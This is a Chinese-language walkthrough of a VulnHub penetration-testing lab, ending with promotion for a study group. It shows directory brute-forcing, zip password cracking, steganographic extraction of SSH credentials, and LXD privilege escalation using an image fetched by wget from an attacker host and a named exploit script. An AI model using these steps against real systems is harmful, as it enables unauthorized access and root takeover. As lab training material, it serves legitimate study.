简介
每日一攻防是由全球安全研究员 VulnHub 提供的日常实战综合环境。大余安全将按照顺序选择 VulnHub 提供的渗透测试靶场,为网络安全爱好者、渗透测试从业者和安全研究员提供每日综合性的攻击和防御挑战。该项目的目标是促进参与者的技能提升,使他们更好地理解实际攻击和防御场景。
每日一攻防特色:
环境攻破:以简单直白的方式攻破每日选择的渗透测试环境。
代码审计:进行攻防分析,结合代码审计,深入挖掘漏洞和强化防御。
作者:大余
一、网络枚举
发现ip地址:192.168.3.86
192.168.3.86
二、web信息收集
发现site目录:
找了一下没有什么有用的信息!目录爆破:
gobuster dir -u http://192.168.3.86/site/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
发现有一个war.txt!
提示存在访问目录信息!
三、编码爆破
访问发现这是base64编码信息,编码下载:
使用file命令发现,是一个zip文件,解压:
需要密码爆破,使用zip2john把他的密码信息提取出来用john爆破:
ragnarok123
四、隐写解密
解压后发现一张图:
用binwalk查看一下有没有隐藏文件:
用-e提取出来发现两个文件信息。
发现一组类似账号密码!
五、信息收集
ssh [email protected]
f@m0usboatbuilde7
成功登录进来。
发现lxd,LXD是下一代系统容器管理器,它为用户提供了与虚拟机类似的环境!直接lxd提权root!!
六、提权
wget http://192.168.3.149:8000/alpine-v3.17-x86_64-20230110_0404.tar.gz
防火墙拦截了,改为80端口即可。
lxd关闭下网络:
一路回车即可!直接exp提权:
上传脚本直接提权即可:
./46978.sh -f alpine-v3.17-x86_64-20230110_0404.tar.gz
这里并没有什么可分析的源代码。
通过每日一攻防,我致力于共同深探网络安全的奥秘,助力每位参与者成为网络安全领域的技术高手。立即加入大余安全,共同迎接每日新的挑战!
扫描下方二维码添加小助手,进群和大余老师一起技术探讨交流吧!
欢迎大家进入大余安全回忆录帮会,每周二&五定期更新《安全开发》、《渗透测试》系列文章,帮助大家从0基础到入门。